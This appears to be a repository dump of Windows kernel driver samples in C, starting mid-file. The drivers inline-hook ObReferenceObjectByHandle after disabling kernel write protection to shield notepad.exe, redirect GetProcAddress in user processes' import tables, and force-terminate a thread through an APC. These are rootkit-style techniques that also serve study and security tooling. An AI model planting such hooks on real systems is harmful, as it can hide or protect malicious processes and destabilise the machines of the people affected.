77 | break; 78 | } 79 | } 80 | for (i = 0; iDriverUnload = Unload; 114 | return STATUS_SUCCESS; 115 | } -------------------------------------------------------------------------------- /Inline Hook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /Inline Hook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=inlinehook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /InlineHookObReferenced/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "windef.h" 3 | 4 | extern POBJECT_TYPE *PsProcessType; 5 | 6 | void InlineHookObreferenceObjectByHandle(); 7 | void Unhook(); 8 | 9 | char ProcessName[] = "notepad.exe"; 10 | 11 | int NewObReferenceObjectByHandle( 12 | HANDLE Handle, 13 | ACCESS_MASK DesiredAccess, 14 | POBJECT_TYPE ObjectType, 15 | KPROCESSOR_MODE AccessMode, 16 | PVOID *Object, 17 | POBJECT_HANDLE_INFORMATION HandleInformation 18 | ); 19 | 20 | __declspec(naked) NewFunction( 21 | IN HANDLE Handle, 22 | IN ACCESS_MASK DesiredAccess, 23 | IN POBJECT_TYPE ObjectType OPTIONAL, 24 | IN KPROCESSOR_MODE AccessMode, 25 | OUT PVOID *Object, 26 | OUT POBJECT_HANDLE_INFORMATION HandleInformation OPTIONAL 27 | ) 28 | { 29 | _asm 30 | { 31 | mov edi,edi; 32 | push ebp; 33 | mov ebp,esp; 34 | push [ebp+0x1c]; 35 | push [ebp+0x18]; 36 | push [ebp+0x14]; 37 | push [ebp+0x10]; 38 | push [ebp+0xc]; 39 | push [ebp+8]; 40 | call NewObReferenceObjectByHandle; 41 | cmp eax,1; 42 | jnz end; 43 | mov [ebp+8],-1; 44 | end: 45 | mov eax,ObReferenceObjectByHandle; 46 | add eax,5; 47 | jmp eax; 48 | } 49 | } 50 | 51 | int NewObReferenceObjectByHandle( 52 | HANDLE Handle, 53 | ACCESS_MASK DesiredAccess, 54 | POBJECT_TYPE ObjectType, 55 | KPROCESSOR_MODE AccessMode, 56 | PVOID *Object, 57 | POBJECT_HANDLE_INFORMATION HandleInformation 58 | ) 59 | { 60 | PEPROCESS Process; 61 | KIRQL oldIrql; 62 | int JmpOffset, ans = 0; 63 | unsigned char JmpCode[5] = { 0xE9, 0xAA, 0xAA, 0xAA, 0xAA}; 64 | unsigned char Code[5] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC }; 65 | 66 | if (ObjectType == *PsProcessType) 67 | { 68 | oldIrql = KeRaiseIrqlToDpcLevel(); 69 | __asm 70 | { 71 | cli; 72 | mov eax, cr0; 73 | and eax, not 10000H; 74 | mov cr0, eax; 75 | } 76 | RtlCopyMemory(ObReferenceObjectByHandle, Code, 5); 77 | ObReferenceObjectByHandle(Handle, DesiredAccess, 78 | ObjectType, AccessMode, &Process, NULL); 79 | if (_stricmp((char*)((char*)Process+0x174), ProcessName) == 0) 80 | { 81 | ans = 1; 82 | } 83 | JmpOffset = (char*)NewFunction - (char*)ObReferenceObjectByHandle - 5; 84 | RtlCopyMemory(JmpCode + 1, &JmpOffset, 4); 85 | RtlCopyMemory(ObReferenceObjectByHandle, JmpCode, 5); 86 | __asm 87 | { 88 | mov eax, cr0; 89 | or eax, 10000H; 90 | mov cr0, eax; 91 | sti; 92 | } 93 | KeLowerIrql(oldIrql); 94 | } 95 | return ans; 96 | } 97 | 98 | void Hook() 99 | { 100 | int JmpOffset; 101 | unsigned char JmpCode[5] = { 0xE9, 0xAA, 0xAA, 0xAA, 0xAA }; 102 | KIRQL oldIrql; 103 | 104 | JmpOffset = (char*)NewFunction - (char*)ObReferenceObjectByHandle - 5; 105 | RtlCopyMemory( JmpCode+1, &JmpOffset, 4); 106 | oldIrql = KeRaiseIrqlToDpcLevel(); 107 | __asm 108 | { 109 | cli; 110 | mov eax, cr0; 111 | and eax, not 10000H; 112 | mov cr0, eax; 113 | } 114 | RtlCopyMemory(ObReferenceObjectByHandle, JmpCode, 5); 115 | __asm 116 | { 117 | mov eax, cr0; 118 | or eax, 10000h; 119 | mov cr0, eax; 120 | sti; 121 | } 122 | KeLowerIrql(oldIrql); 123 | } 124 | 125 | VOID Unload(PDRIVER_OBJECT DriverObject) 126 | { 127 | KIRQL oldIrql; 128 | LARGE_INTEGER Delay; 129 | unsigned char Code[5]={0x8b,0xff,0x55,0x8b,0xec}; 130 | 131 | Delay.QuadPart = -5000000; 132 | KeDelayExecutionThread(KernelMode, TRUE, &Delay); 133 | oldIrql = KeRaiseIrqlToDpcLevel(); 134 | __asm 135 | { 136 | cli; 137 | mov eax,cr0; 138 | and eax,not 10000H; 139 | mov cr0,eax; 140 | } 141 | RtlCopyMemory(ObReferenceObjectByHandle,Code,5); 142 | __asm 143 | { 144 | mov eax, cr0; 145 | or eax, 10000H 146 | mov cr0, eax 147 | sti; 148 | } 149 | KeLowerIrql(oldIrql); 150 | } 151 | 152 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 153 | { 154 | driver->DriverUnload = Unload; 155 | Hook(); 156 | return STATUS_SUCCESS; 157 | } 158 | -------------------------------------------------------------------------------- /InlineHookObReferenced/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /InlineHookObReferenced/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=InlineHookObReferenced 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /KernelAndUserHook/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "pe.h" 3 | #include "ntifs.h" 4 | 5 | DWORD UsersharedMemory = 0x7FFE0800; 6 | DWORD KerlsharedMemory = 0xFFDF0800; 7 | 8 | char temp[] = { 9 | 0x90, 10 | 0xb8, 0xaa,0xaa, 0xaa, 0xaa, 11 | 0xff, 0xe0 12 | }; 13 | char s[256]; 14 | 15 | NTSTATUS Hook(PIMAGE_DOS_HEADER base, HANDLE dwProcessID) 16 | { 17 | PIMAGE_DOS_HEADER dosHeader; 18 | PIMAGE_NT_HEADERS pNTHeader; 19 | PIMAGE_IMPORT_DESCRIPTOR pIID; 20 | PIMAGE_IMPORT_BY_NAME pImportByName; 21 | DWORD RVA; 22 | PDWORD pIAT, pINT; 23 | 24 | int count, index; 25 | char *dllName = NULL; 26 | char *dllTarget = "kernel32.dll"; 27 | char *funcTarget = "GetProcAddress"; 28 | PMDL MyMDL; 29 | PDWORD MappedTable; 30 | 31 | dosHeader = base; 32 | pNTHeader = (PIMAGE_NT_HEADERS)(dosHeader->e_lfanew + (DWORD)base); 33 | 34 | if (pNTHeader->Signature != IMAGE_NT_SIGNATURE) 35 | return STATUS_INVALID_IMAGE_FORMAT; 36 | 37 | RVA = pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; 38 | pIID = (PIMAGE_IMPORT_DESCRIPTOR)(RVA + (DWORD)base); 39 | 40 | for (count = 0; pIID[count].Characteristics!=0; count++) 41 | { 42 | dllName = (char *)(pIID[count].Name + (DWORD)base); 43 | pIAT = (PDWORD)((DWORD)base + (DWORD)pIID[count].FirstThunk); 44 | pINT = (PDWORD)((DWORD)base + (DWORD)pIID[count].OriginalFirstThunk); 45 | for (index=0; pIAT[index]!=0; index++) 46 | { 47 | if ((pINT[index] & IMAGE_ORDINAL_FLAG) != IMAGE_ORDINAL_FLAG) 48 | { 49 | pImportByName = (PIMAGE_IMPORT_BY_NAME)(pINT[index] + (DWORD)base); 50 | if ((_stricmp(dllName, dllTarget) == 0) && 51 | (_stricmp(pImportByName->Name, funcTarget) == 0)) 52 | { 53 | MyMDL = MmCreateMdl(NULL, &pIAT[index], 4); 54 | if (!MyMDL) return STATUS_UNSUCCESSFUL; 55 | MmBuildMdlForNonPagedPool(MyMDL); 56 | MyMDL->MdlFlags |= MDL_MAPPED_TO_SYSTEM_VA; 57 | MappedTable = MmMapLockedPages(MyMDL, KernelMode); 58 | RtlCopyMemory((PVOID)KerlsharedMemory, temp, 8); 59 | RtlCopyMemory((PVOID)(KerlsharedMemory+2), (PVOID)&pIAT[index], 4); 60 | *MappedTable = UsersharedMemory; 61 | MmUnmapLockedPages(MappedTable,MyMDL); 62 | IoFreeMdl(MyMDL); 63 | } 64 | } 65 | } 66 | } 67 | return STATUS_SUCCESS; 68 | } 69 | 70 | 71 | NTSTATUS HookStart(HANDLE dwProcessID) 72 | { 73 | ULONG pEProcess; 74 | PLIST_ENTRY pCurrentList = NULL, pTempList = NULL, pLoadOrderModuleList, list; 75 | PPEB pPeb = NULL; 76 | ULONG hModule, temp; 77 | PsLookupProcessByProcessId(dwProcessID,(PEPROCESS*)&pEProcess); 78 | pPeb = (PPEB)(*(PULONG)(pEProcess + PEBOFFSET)); 79 | if(pPeb != NULL) 80 | { 81 | KeAttachProcess((PRKPROCESS)pEProcess); 82 | pLoadOrderModuleList = pPeb->LoaderData->InLoadOrderModuleList.Flink; 83 | list = pLoadOrderModuleList; 84 | do 85 | { 86 | UNICODE_STRING pstrTemp = ((PLDR_MODULE)list)->FullDllName; 87 | DbgPrint("module name = %ws\n\n\n\n",pstrTemp.Buffer); 88 | if(wcsstr(pstrTemp.Buffer,L".exe") != NULL) 89 | { 90 | hModule = (ULONG)((PLDR_MODULE)list)->BaseAddress; 91 | temp = *(PULONG)hModule; 92 | DbgPrint("Find Module baseAaddress = %x\n\n\n",hModule); 93 | Hook((PIMAGE_DOS_HEADER)hModule,dwProcessID); 94 | break; 95 | } 96 | list = list->Flink; 97 | } while(list != pLoadOrderModuleList); 98 | KeDetachProcess(); 99 | } 100 | return STATUS_SUCCESS; 101 | } 102 | 103 | 104 | void MyFunc(IN PUNICODE_STRING dllName, 105 | IN HANDLE hProcess, 106 | IN PIMAGE_INFO pImageInfo) 107 | { 108 | UNICODE_STRING targetDll; 109 | RtlInitUnicodeString(&targetDll, L"\\WINDOWS\\system32\\kernel32.dll"); 110 | if (RtlCompareUnicodeString(dllName, &targetDll, FALSE) == 0) 111 | { 112 | DbgPrint(" imageInfo->ImageBase:%x ProcessId : %d\n", pImageInfo->ImageBase, hProcess); 113 | HookStart(hProcess); 114 | } 115 | } 116 | 117 | void Unload(PDRIVER_OBJECT driver) 118 | { 119 | 120 | DbgPrint("Unload\n"); 121 | } 122 | 123 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 124 | { 125 | DbgPrint("DriverEntry\n"); 126 | driver->DriverUnload = Unload; 127 | PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)MyFunc); 128 | return STATUS_SUCCESS; 129 | } 130 | 131 | -------------------------------------------------------------------------------- /KernelAndUserHook/makefile: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /KernelAndUserHook/pe.h: -------------------------------------------------------------------------------- 1 | #ifndef _PE_H 2 | #define _PE_H 3 | 4 | typedef unsigned int DWORD; 5 | typedef unsigned char BYTE; 6 | typedef unsigned short WORD; 7 | typedef unsigned int* PDWORD; 8 | typedef unsigned char* PBYTE; 9 | typedef unsigned short* PWORD; 10 | 11 | #define IMAGE_DOS_SIGNATURE 0x5A4D // MZ 12 | #define IMAGE_OS2_SIGNATURE 0x454E // NE 13 | #define IMAGE_OS2_SIGNATURE_LE 0x454C // LE 14 | #define IMAGE_VXD_SIGNATURE 0x454C // LE 15 | #define IMAGE_NT_SIGNATURE 0x00004550 // PE00 16 | #define IMAGE_ORDINAL_FLAG 0x80000000 17 | 18 | typedef struct _IMAGE_IMPORT_BY_NAME { 19 | WORD Hint; 20 | BYTE Name[1]; 21 | } IMAGE_IMPORT_BY_NAME, *PIMAGE_IMPORT_BY_NAME; 22 | 23 | 24 | typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11 25 | ULONG Reserved[2]; 26 | PVOID Base; 27 | ULONG Size; 28 | ULONG Flags; 29 | USHORT Index; 30 | USHORT Unknown; 31 | USHORT LoadCount; 32 | USHORT ModuleNameOffset; 33 | CHAR ImageName[256]; 34 | } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; 35 | 36 | 37 | typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header 38 | WORD e_magic; // Magic number 39 | WORD e_cblp; // Bytes on last page of file 40 | WORD e_cp; // Pages in file 41 | WORD e_crlc; // Relocations 42 | WORD e_cparhdr; // Size of header in paragraphs 43 | WORD e_minalloc; // Minimum extra paragraphs needed 44 | WORD e_maxalloc; // Maximum extra paragraphs needed 45 | WORD e_ss; // Initial (relative) SS value 46 | WORD e_sp; // Initial SP value 47 | WORD e_csum; // Checksum 48 | WORD e_ip; // Initial IP value 49 | WORD e_cs; // Initial (relative) CS value 50 | WORD e_lfarlc; // File address of relocation table 51 | WORD e_ovno; // Overlay number 52 | WORD e_res[4]; // Reserved words 53 | WORD e_oemid; // OEM identifier (for e_oeminfo) 54 | WORD e_oeminfo; // OEM information; e_oemid specific 55 | WORD e_res2[10]; // Reserved words 56 | LONG e_lfanew; // File address of new exe header 57 | } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; 58 | 59 | 60 | typedef struct _IMAGE_DATA_DIRECTORY { 61 | DWORD VirtualAddress; 62 | DWORD Size; 63 | } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY; 64 | #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16 65 | 66 | typedef struct _IMAGE_OPTIONAL_HEADER { 67 | // 68 | // Standard fields. 69 | // 70 | 71 | WORD Magic; 72 | BYTE MajorLinkerVersion; 73 | BYTE MinorLinkerVersion; 74 | DWORD SizeOfCode; 75 | DWORD SizeOfInitializedData; 76 | DWORD SizeOfUninitializedData; 77 | DWORD AddressOfEntryPoint; 78 | DWORD BaseOfCode; 79 | DWORD BaseOfData; 80 | 81 | // 82 | // NT additional fields. 83 | // 84 | 85 | DWORD ImageBase; 86 | DWORD SectionAlignment; 87 | DWORD FileAlignment; 88 | WORD MajorOperatingSystemVersion; 89 | WORD MinorOperatingSystemVersion; 90 | WORD MajorImageVersion; 91 | WORD MinorImageVersion; 92 | WORD MajorSubsystemVersion; 93 | WORD MinorSubsystemVersion; 94 | DWORD Win32VersionValue; 95 | DWORD SizeOfImage; 96 | DWORD SizeOfHeaders; 97 | DWORD CheckSum; 98 | WORD Subsystem; 99 | WORD DllCharacteristics; 100 | DWORD SizeOfStackReserve; 101 | DWORD SizeOfStackCommit; 102 | DWORD SizeOfHeapReserve; 103 | DWORD SizeOfHeapCommit; 104 | DWORD LoaderFlags; 105 | DWORD NumberOfRvaAndSizes; 106 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 107 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 108 | 109 | typedef IMAGE_OPTIONAL_HEADER32 IMAGE_OPTIONAL_HEADER; 110 | typedef PIMAGE_OPTIONAL_HEADER32 PIMAGE_OPTIONAL_HEADER; 111 | 112 | typedef struct _IMAGE_THUNK_DATA32 { 113 | union { 114 | DWORD ForwarderString; // PBYTE 115 | DWORD Function; // PDWORD 116 | DWORD Ordinal; 117 | DWORD AddressOfData; // PIMAGE_IMPORT_BY_NAME 118 | } u1; 119 | } IMAGE_THUNK_DATA32; 120 | typedef IMAGE_THUNK_DATA32 * PIMAGE_THUNK_DATA32; 121 | typedef IMAGE_THUNK_DATA32 IMAGE_THUNK_DATA; 122 | typedef PIMAGE_THUNK_DATA32 PIMAGE_THUNK_DATA; 123 | 124 | typedef struct _IMAGE_IMPORT_DESCRIPTOR { 125 | union { 126 | DWORD Characteristics; // 0 for terminating null import descriptor 127 | DWORD OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA) 128 | }; 129 | DWORD TimeDateStamp; // 0 if not bound, 130 | // -1 if bound, and real date\time stamp 131 | // in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND) 132 | // O.W. date/time stamp of DLL bound to (Old BIND) 133 | 134 | DWORD ForwarderChain; // -1 if no forwarders 135 | DWORD Name; 136 | DWORD FirstThunk; // RVA to IAT (if bound this IAT has actual addresses) 137 | } IMAGE_IMPORT_DESCRIPTOR; 138 | typedef IMAGE_IMPORT_DESCRIPTOR UNALIGNED *PIMAGE_IMPORT_DESCRIPTOR; 139 | 140 | 141 | typedef struct _IMAGE_EXPORT_DIRECTORY { 142 | DWORD Characteristics; 143 | DWORD TimeDateStamp; 144 | WORD MajorVersion; 145 | WORD MinorVersion; 146 | DWORD Name; 147 | DWORD Base; 148 | DWORD NumberOfFunctions; 149 | DWORD NumberOfNames; 150 | DWORD AddressOfFunctions; // RVA from base of image 151 | DWORD AddressOfNames; // RVA from base of image 152 | DWORD AddressOfNameOrdinals; // RVA from base of image 153 | } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY; 154 | 155 | 156 | #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory 157 | #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 158 | 159 | typedef unsigned char *PBYTE; 160 | 161 | typedef struct _GENERATE_NAME_CONTEXT { 162 | USHORT Checksum; 163 | BOOLEAN CheckSumInserted; 164 | UCHAR NameLength; 165 | WCHAR NameBuffer[8]; 166 | ULONG ExtensionLength; 167 | WCHAR ExtensionBuffer[4]; 168 | ULONG LastIndexValue; 169 | } GENERATE_NAME_CONTEXT, *PGENERATE_NAME_CONTEXT; 170 | 171 | 172 | typedef struct _IMAGE_FILE_HEADER { 173 | WORD Machine; 174 | WORD NumberOfSections; 175 | DWORD TimeDateStamp; 176 | DWORD PointerToSymbolTable; 177 | DWORD NumberOfSymbols; 178 | WORD SizeOfOptionalHeader; 179 | WORD Characteristics; 180 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 181 | 182 | #define SEC_IMAGE 0x01000000 183 | #define SEC_BASED 0x00200000 184 | typedef struct _SECTION_IMAGE_INFORMATION { 185 | PVOID EntryPoint; 186 | ULONG StackZeroBits; 187 | ULONG StackReserved; 188 | ULONG StackCommit; 189 | ULONG ImageSubsystem; 190 | WORD SubsystemVersionLow; 191 | WORD SubsystemVersionHigh; 192 | ULONG Unknown1; 193 | ULONG ImageCharacteristics; 194 | ULONG ImageMachineType; 195 | ULONG Unknown2[3]; 196 | } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; 197 | 198 | typedef struct _IMAGE_NT_HEADERS { 199 | DWORD Signature; 200 | IMAGE_FILE_HEADER FileHeader; 201 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 202 | } IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS; 203 | 204 | #define FLINKOFFSET 0xA0 205 | #define PEBOFFSET 0x1B0 206 | 207 | typedef void (*PPEBLOCKROUTINE)(PVOID PebLock); 208 | 209 | typedef struct _LDR_MODULE { 210 | LIST_ENTRY InLoadOrderModuleList; 211 | LIST_ENTRY InMemoryOrderModuleList; 212 | LIST_ENTRY InInitializationOrderModuleList; 213 | PVOID BaseAddress; 214 | PVOID EntryPoint; 215 | ULONG SizeOfImage; 216 | UNICODE_STRING FullDllName; 217 | UNICODE_STRING BaseDllName; 218 | ULONG Flags; 219 | SHORT LoadCount; 220 | SHORT TlsIndex; 221 | LIST_ENTRY HashTableEntry; 222 | ULONG TimeDateStamp; 223 | } LDR_MODULE, *PLDR_MODULE; 224 | 225 | typedef struct _PEB_LDR_DATA 226 | { 227 | ULONG Length; 228 | BOOLEAN Initialized; 229 | PVOID SsHandle; 230 | LIST_ENTRY InLoadOrderModuleList; 231 | LIST_ENTRY InMemoryOrderModuleList; 232 | LIST_ENTRY InInitializationOrderModuleList; 233 | } PEB_LDR_DATA, *PPEB_LDR_DATA; 234 | 235 | typedef struct _PEB_FREE_BLOCK { 236 | struct _PEB_FREE_BLOCK *Next; 237 | ULONG Size; 238 | } PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; 239 | 240 | typedef struct _RTL_DRIVE_LETTER_CURDIR { 241 | USHORT Flags; 242 | USHORT Length; 243 | ULONG TimeStamp; 244 | UNICODE_STRING DosPath; 245 | } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; 246 | 247 | typedef struct _RTL_USER_PROCESS_PARAMETERS { 248 | ULONG MaximumLength; 249 | ULONG Length; 250 | ULONG Flags; 251 | ULONG DebugFlags; 252 | PVOID ConsoleHandle; 253 | ULONG ConsoleFlags; 254 | HANDLE StdInputHandle; 255 | HANDLE StdOutputHandle; 256 | HANDLE StdErrorHandle; 257 | UNICODE_STRING CurrentDirectoryPath; 258 | HANDLE CurrentDirectoryHandle; 259 | UNICODE_STRING DllPath; 260 | UNICODE_STRING ImagePathName; 261 | UNICODE_STRING CommandLine; 262 | PVOID Environment; 263 | ULONG StartingPositionLeft; 264 | ULONG StartingPositionTop; 265 | ULONG Width; 266 | ULONG Height; 267 | ULONG CharWidth; 268 | ULONG CharHeight; 269 | ULONG ConsoleTextAttributes; 270 | ULONG WindowFlags; 271 | ULONG ShowWindowFlags; 272 | UNICODE_STRING WindowTitle; 273 | UNICODE_STRING DesktopName; 274 | UNICODE_STRING ShellInfo; 275 | UNICODE_STRING RuntimeData; 276 | RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20]; 277 | } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 278 | 279 | typedef struct _PEB { 280 | BOOLEAN InheritedAddressSpace; 281 | BOOLEAN ReadImageFileExecOptions; 282 | BOOLEAN BeingDebugged; 283 | BOOLEAN Spare; 284 | HANDLE Mutant; 285 | PVOID ImageBaseAddress; 286 | PPEB_LDR_DATA LoaderData; 287 | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; 288 | PVOID SubSystemData; 289 | PVOID ProcessHeap; 290 | PVOID FastPebLock; 291 | PPEBLOCKROUTINE FastPebLockRoutine; 292 | PPEBLOCKROUTINE FastPebUnlockRoutine; 293 | ULONG EnvironmentUpdateCount; 294 | PVOID *KernelCallbackTable; 295 | PVOID EventLogSection; 296 | PVOID EventLog; 297 | PPEB_FREE_BLOCK FreeList; 298 | ULONG TlsExpansionCounter; 299 | PVOID TlsBitmap; 300 | ULONG TlsBitmapBits[0x2]; 301 | PVOID ReadOnlySharedMemoryBase; 302 | PVOID ReadOnlySharedMemoryHeap; 303 | PVOID *ReadOnlyStaticServerData; 304 | PVOID AnsiCodePageData; 305 | PVOID OemCodePageData; 306 | PVOID UnicodeCaseTableData; 307 | ULONG NumberOfProcessors; 308 | ULONG NtGlobalFlag; 309 | UCHAR Spare2[0x4]; 310 | LARGE_INTEGER CriticalSectionTimeout; 311 | ULONG HeapSegmentReserve; 312 | ULONG HeapSegmentCommit; 313 | ULONG HeapDeCommitTotalFreeThreshold; 314 | ULONG HeapDeCommitFreeBlockThreshold; 315 | ULONG NumberOfHeaps; 316 | ULONG MaximumNumberOfHeaps; 317 | PVOID **ProcessHeaps; 318 | PVOID GdiSharedHandleTable; 319 | PVOID ProcessStarterHelper; 320 | PVOID GdiDCAttributeList; 321 | PVOID LoaderLock; 322 | ULONG OSMajorVersion; 323 | ULONG OSMinorVersion; 324 | ULONG OSBuildNumber; 325 | ULONG OSPlatformId; 326 | ULONG ImageSubSystem; 327 | ULONG ImageSubSystemMajorVersion; 328 | ULONG ImageSubSystemMinorVersion; 329 | ULONG GdiHandleBuffer[0x22]; 330 | ULONG PostProcessInitRoutine; 331 | ULONG TlsExpansionBitmap; 332 | UCHAR TlsExpansionBitmapBits[0x80]; 333 | ULONG SessionId; 334 | } PEB, *PPEB; 335 | 336 | #endif -------------------------------------------------------------------------------- /KernelAndUserHook/sources: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | TARGETNAME=KernelAndUserHook 3 | TARGETPATH=obj 4 | TARGETTYPE=DRIVER 5 | 6 | # Create browse info 7 | #BROWSER_INFO=1 8 | #BROWSERFILE= 9 | 10 | # Additional defines for the C/C++ preprocessor 11 | C_DEFINES=$(C_DEFINES) 12 | 13 | SOURCES=main.c 14 | -------------------------------------------------------------------------------- /KillThread/LDasm.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roadwy/Record/c29fe1c8f25000faf378dde7d1b38c47925e98ef/KillThread/LDasm.c -------------------------------------------------------------------------------- /KillThread/LDasm.h: -------------------------------------------------------------------------------- 1 | /* 2 | */ 3 | 4 | #ifndef _LDASM_ 5 | #define _LDASM_ 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | unsigned long __fastcall SizeOfCode(void *Code, unsigned char **pOpcode); 12 | 13 | unsigned long __fastcall SizeOfProc(void *Proc); 14 | 15 | char __fastcall IsRelativeCmd(unsigned char *pOpcode); 16 | 17 | #ifdef __cplusplus 18 | } 19 | #endif 20 | 21 | #endif 22 | 23 | -------------------------------------------------------------------------------- /KillThread/main.c: -------------------------------------------------------------------------------- 1 | #include "ntddk.h" 2 | #include "LDasm.h" 3 | 4 | typedef enum _KAPC_ENVIRONMENT { 5 | OriginalApcEnvironment, 6 | AttachedApcEnvironment, 7 | CurrentApcEnvironment, 8 | InsertApcEnvironment 9 | } KAPC_ENVIRONMENT; 10 | 11 | NTKERNELAPI 12 | void 13 | KeInitializeApc( 14 | PKAPC Apc, 15 | PETHREAD Thread, 16 | KAPC_ENVIRONMENT Environment, 17 | PKKERNEL_ROUTINE KernelRoutine, 18 | PKRUNDOWN_ROUTINE RundownRoutine, 19 | PKNORMAL_ROUTINE NormalRoutine, 20 | KPROCESSOR_MODE ProcessorMode, 21 | PVOID NormalContext ); 22 | 23 | NTKERNELAPI 24 | BOOLEAN 25 | KeInsertQueueApc( 26 | PKAPC Apc, 27 | PVOID SystemArgument1, 28 | PVOID SystemArgument2, 29 | KPRIORITY Increment ); 30 | 31 | #define PS_CROSS_THREAD_FLAGS_SYSTEM 0x00000010UL 32 | 33 | ULONG GetThreadFlagsOffset() 34 | { 35 | UCHAR *cPtr, *pOpcode; 36 | ULONG Length; 37 | USHORT Offset; 38 | 39 | for (cPtr = (PUCHAR)PsTerminateSystemThread; 40 | cPtr < (PUCHAR)PsTerminateSystemThread + 0x100; 41 | cPtr += Length) 42 | { 43 | Length = SizeOfCode(cPtr, &pOpcode); 44 | if (!Length) break; 45 | if (*(USHORT *)pOpcode == 0x80F6) 46 | { 47 | Offset = *(USHORT *)((ULONG)pOpcode + 2); 48 | return Offset; 49 | } 50 | } 51 | return 0; 52 | } 53 | 54 | void KernelTerminateThreadRoutine( 55 | IN PKAPC Apc, 56 | IN OUT PKNORMAL_ROUTINE *NormalRoutine, 57 | IN OUT PVOID *NormalContext, 58 | IN OUT PVOID *SystemArgument1, 59 | IN OUT PVOID *SystemArgument2) 60 | { 61 | ULONG ThreadFlagsOffset = GetThreadFlagsOffset(); 62 | PULONG ThreadFlags; 63 | DbgPrint("[TerminateThread] KernelTerminateThreadRoutine.\n"); 64 | ExFreePool(Apc); 65 | if (ThreadFlagsOffset) 66 | { 67 | ThreadFlags = (ULONG *)((ULONG)(PsGetCurrentThread()) + ThreadFlagsOffset); 68 | *ThreadFlags |= PS_CROSS_THREAD_FLAGS_SYSTEM; 69 | PsTerminateSystemThread(STATUS_SUCCESS); 70 | } 71 | else 72 | { 73 | DbgPrint("cannot get thread flags offset!\n"); 74 | } 75 | } 76 | 77 | BOOLEAN TerminateThread(PETHREAD Thread) 78 | { 79 | PKAPC Apc = NULL; 80 | BOOLEAN success = FALSE; 81 | if (!MmIsAddressValid(Thread)) 82 | return FALSE; 83 | Apc = ExAllocatePool(NonPagedPool, sizeof(KAPC)); 84 | KeInitializeApc( 85 | Apc, 86 | Thread, 87 | OriginalApcEnvironment, 88 | KernelTerminateThreadRoutine, 89 | NULL, 90 | NULL, 91 | KernelMode, 92 | NULL); 93 | success = KeInsertQueueApc(Apc, 94 | NULL, 95 | NULL, 96 | 0); 97 | return success; 98 | } 99 | 100 | VOID Unload(PDRIVER_OBJECT driver) 101 | { 102 | DbgPrint("[TerminateThread] Unloaded!\n"); 103 | } 104 | 105 | NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING szReg) 106 | { 107 | DbgPrint("[TerminateThread] DriverEntry!\n"); 108 | TerminateThread((PETHREAD)0x81982540); 109 | driver->DriverUnload = Unload; 110 | return STATUS_SUCCESS; 111 | } -------------------------------------------------------------------------------- /KillThread/makefile: -------------------------------------------------------------------------------- 